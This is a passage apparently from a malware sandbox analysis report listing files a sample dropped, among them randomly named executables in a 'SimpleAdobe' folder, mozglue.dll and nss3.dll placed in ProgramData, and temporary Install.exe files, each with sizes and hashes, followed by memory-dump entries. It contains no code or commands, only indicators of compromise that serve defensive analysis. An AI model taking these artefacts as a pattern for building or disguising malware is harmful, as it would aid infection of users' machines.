0d990bedac4696a67ad46dbc686750086f72f4795ed8a6121782ba3b0dc736b5

SHA512
f70dccd6fd95516eac21b0cc30c70fb5f17c3c8f1f3b28fe3bdaec6053c2de53daf68caf422dea8861e4ab84f3dd7be36965c6998c1380dbf2a05a2a74b36b28

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\oGahnUQ3rh3YlX0uwwfEFaVl.exe

Filesize
5.2MB

MD5
55db085a5e2ae74fba99159dd4c7d159

SHA1
fd7fc239dc4355c3a15268958c21708f214d1cf2

SHA256
83a475e89ba47df9bc3b5e27bb3af2928da01fc25a2de4d672db2e61b22d95e8

SHA512
689d4811f650ed1bd424851b5a730b91bf8104c75719901f053ea4f7c021538baa05b88a7325a29a6b2ed3bfa405767e30a1b9ca2a8e001b8df5dc646305f1c3

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\w8VcQsjDmh1yU_gofgrWJrfe.exe

Filesize
7.3MB

MD5
0605e661cbaebd285d6316e4bfd354e6

SHA1
a2d40d5bc179522f025e701f442c3fb5adbacc0c

SHA256
66e31f2a8f9575871cae574c1da1ecae8d1876599942e7bd68c107af5cfb5d88

SHA512
51c57fd8a3e85c325f13bdb9f03a2397371f36a5da4074f1d4af0192a5e6e30e00af0f71ed20a3d14fb9c49728ec92867e8ed63b69001dbf019bcb87fdec3b6c

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\Temp\7zS83FF.tmp\Install.exe

Filesize
6.4MB

MD5
57a3ea5d2099d2408beeeef19666582f

SHA1
fc977ac73e43866eb0dde7b163b32dad825ff2aa

SHA256
4612ca6f60abe157509c516951d19687ffc913c30fb470b5005125b54f0cabd9

SHA512
dfd3f82f1abcde70f40cbce93a858b82d677e456ca44ffe2999a24b6ae7bef79f318e08769ba8efb32836a7492934da71351c28c81747855a845a19c6adb756e

Download Submit
\Users\Admin\AppData\Local\Temp\7zS8BAC.tmp\Install.exe

Filesize
6.6MB

MD5
c459c807bebcbb6553ff3388b249a9fd

SHA1
6e428b6c77c966e33c5c0e321d722b57bd3bf975

SHA256
9c3372c448ccebbe7b771c24c207a0ae0e145a25d0e96f5ffb0559ff5571154b

SHA512
7641130d16107aa5bdf16f39a6f9e6404230376bae4a9489b0b9462218075c4a0cea35cff3b434c6a352f05f49aca4a3f71839acf16cbe278ac49235ca6291cf

Download Submit
\Users\Admin\AppData\Local\Temp\7zS8E2C.tmp\Install.exe

Filesize
6.7MB

MD5
7d81480dc33ed5603a660ab787ba942b

SHA1
04e0360d151b0c30778f3f747d43bd80785310a3

SHA256
a63e0ec7bf6eee3581885b2d8e0a4b9fc33922c734591704925f15ffc2f257c4

SHA512
834cfae4be9f95429ce40ef492a6089766c0e8b39748a8ef905d25785693947a4aaa1dd6c18a3d0698b278f7aef5159955b86e091f8cff8b95883679ad303bbf

Download Submit
\Users\Admin\AppData\Local\Temp\is-8K34Q.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-8K34Q.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-L567R.tmp\oGahnUQ3rh3YlX0uwwfEFaVl.tmp

Filesize
680KB

MD5
70295416713c0ce535665d806e3d54ac

SHA1
fe13c334ec67412f41fe190f93da7d45a57eccbd

SHA256
958c5f807a8268b09828e0f02a6c75a92f3a87dbd1853eb62e5996db990ba2ba

SHA512
2336597fb6ffe697ba62cd931479108556fee44319176989f961ae43aea62b111df6870a169202c6d960aface42779a2f82db48a69fe2072b711a512812f925c

Download Submit
memory/1068-1188-0x0000000004000000-0x00000000043AE000-memory.dmp

Filesize
3.7MB

Download
memory/1068-1855-0x0000000004000000-0x00000000043AE000-memory.dmp

Filesize
3.7MB

Download
memory/1200-1181-0x0000000002410000-0x0000000002AD0000-memory.dmp

Filesize
6.8MB

Download
memory/1200-1822-0x0000000002410000-0x0000000002AD0000-memory.dmp

Filesize
6.8MB

Download
memory/1696-1216-0x0000000000400000-0x00000000007AE000-memory.dmp

Filesize
3.7MB

Download
memory/1696-1197-0x0000000000400000-0x00000000007AE000-memory.dmp

Filesize
3.7MB

Download
memory/1696-1189-0x0000000000400000-0x00000000007AE000-memory.dmp

Filesize
3.7MB

Download
memory/1948-1057-0x000000013F7B0000-0x000000013FE46000-memory.dmp

Filesize
6.6MB

Download
memory/1988-6-0x0000000076EB0000-0x0000000076EB2000-memory.dmp

Filesize
8KB

Download
memory/1988-13-0x0000000076EC0000-0x0000000076EC2000-memory.dmp

Filesize
8KB

Download
memory/1988-1-0x0000000076EA0000-0x0000000076EA2000-memory.dmp

Filesize
8KB

Download
memory/1988-0-0x000000013FBA5000-0x000000013FE38000-memory.dmp

Filesize
2.6MB

Download
memory/1988-34-0x000007FEFCEB0000-0x000007FEFCEB2000-memory.dmp

Filesize
8KB

Download
memory/1988-5-0x0000000076EA0000-0x0000000076EA2000-memory.dmp

Filesize
8KB

Download
memory/1988-148-0x000000013FA40000-0x00000001402C1000-memory.dmp

Filesize
8.5MB

Download
memory/1988-29-0x000007FEFCEA0000-0x000007FEFCEA2000-memory.dmp

Filesize
8KB

Download
memory/1988-1280-0x000000013FA40000-0x00000001402C1000-memory.dmp

Filesize
8.5MB

Download
memory/1988-36-0x000007FEFCEB0000-0x000007FEFCEB2000-memory.dmp

Filesize
8KB

Download
memory/1988-3-0x0000000076EA0000-0x0000000076EA2000-memory.dmp

Filesize
8KB

Download
memory/1988-8-0x0000000076EB0000-0x0000000076EB2000-memory.dmp

Filesize
8KB

Download
memory/1988-10-0x0000000076EB0000-0x0000000076EB2000-memory.dmp

Filesize
8KB

Download
memory/1988-20-0x0000000076ED0000-0x0000000076ED2000-memory.dmp

Filesize
8KB

Download
memory/1988-26-0x0000000076EE0000-0x0000000076EE2000-memory.dmp

Filesize
8KB

Download
memory/1988-24-0x0000000076EE0000-0x0000000076EE2000-memory.dmp

Filesize
8KB

Download
memory/1988-22-0x0000000076EE0000-0x0000000076EE2000-memory.dmp

Filesize
8KB

Download
memory/1988-18-0x0000000076ED0000-0x0000000076ED2000-memory.dmp

Filesize
8KB

Download
memory/1988-16-0x0000000076ED0000-0x0000000076ED2000-memory.dmp

Filesize
8KB

Download
memory/1988-21-0x000000013FA40000-0x00000001402C1000-memory.dmp

Filesize
8.5MB

Download
memory/1988-147-0x000000013FBA5000-0x000000013FE38000-memory.dmp

Filesize
2.6MB

Download
memory/1988-15-0x0000000076EC0000-0x0000000076EC2000-memory.dmp

Filesize
8KB

Download
memory/1988-31-0x000007FEFCEA0000-0x000007FEFCEA2000-memory.dmp

Filesize
8KB

Download
memory/1988-1278-0x000000013FBA5000-0x000000013FE38000-memory.dmp

Filesize
2.6MB

Download
memory/1988-11-0x0000000076EC0000-0x0000000076EC2000-memory.dmp

Filesize
8KB

Download
memory/2320-1285-0x0000000000390000-0x000000000039A000-memory.dmp

Filesize
40KB

Download
memory/2320-1287-0x0000000000890000-0x00000000008AC000-memory.dmp

Filesize
112KB

Download
memory/2320-1286-0x0000000000DD0000-0x0000000000EDC000-memory.dmp

Filesize
1.0MB

Download
memory/2320-1284-0x00000000013B0000-0x0000000001802000-memory.dmp

Filesize
4.3MB

Download
memory/2344-1161-0x0000000002500000-0x0000000002BA5000-memory.dmp

Filesize
6.6MB

Download
memory/2344-1689-0x0000000002500000-0x0000000002BA5000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1166-0x0000000000190000-0x0000000000835000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1691-0x0000000001330000-0x00000000019D5000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1692-0x0000000001330000-0x00000000019D5000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1690-0x0000000000190000-0x0000000000835000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1167-0x0000000001330000-0x00000000019D5000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1171-0x0000000001330000-0x00000000019D5000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1170-0x0000000001330000-0x00000000019D5000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1693-0x0000000001330000-0x00000000019D5000-memory.dmp

Filesize
6.6MB

Download
memory/2368-1198-0x0000000010000000-0x0000000013BCB000-memory.dmp

Filesize
59.8MB

Download
memory/2420-1195-0x0000000001660000-0x0000000001D20000-memory.dmp

Filesize
6.8MB

Download
memory/2420-1918-0x0000000001660000-0x0000000001D20000-memory.dmp

Filesize
6.8MB

Download
memory/2420-1854-0x0000000000FA0000-0x0000000001660000-memory.dmp

Filesize
6.8MB

Download
memory/2420-1917-0x0000000001660000-0x0000000001D20000-memory.dmp

Filesize
6.8MB

Download
memory/2420-1217-0x0000000010000000-0x00000000110E6000-memory.dmp

Filesize
16.9MB

Download
memory/2420-1196-0x0000000001660000-0x0000000001D20000-memory.dmp

Filesize
6.8MB

Download
memory/2420-1194-0x0000000001660000-0x0000000001D20000-memory.dmp

Filesize
6.8MB

Download
memory/2420-1187-0x0000000000FA0000-0x0000000001660000-memory.dmp

Filesize
6.8MB

Download
memory/2420-1916-0x0000000001660000-0x0000000001D20000-memory.dmp

Filesize
6.8MB

Download
memory/2612-1148-0x0000000076EA0000-0x0000000076EA2000-memory.dmp

Filesize
8KB

Download
memory/2612-1220-0x0000000140000000-0x0000000141919000-memory.dmp

Filesize
25.1MB

Download
memory/2760-1058-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2832-1080-0x0000000000D30000-0x0000000001905000-memory.dmp

Filesize
11.8MB

Download
memory/2832-1238-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/2832-1425-0x0000000000D30000-0x0000000001905000-memory.dmp

Filesize
11.8MB

Download
memory/2840-1975-0x0000000000400000-0x00000000007AE000-memory.dmp

Filesize
3.7MB

Download
memory/2840-1223-0x0000000000400000-0x00000000007AE000-memory.dmp

Filesize
3.7MB

Download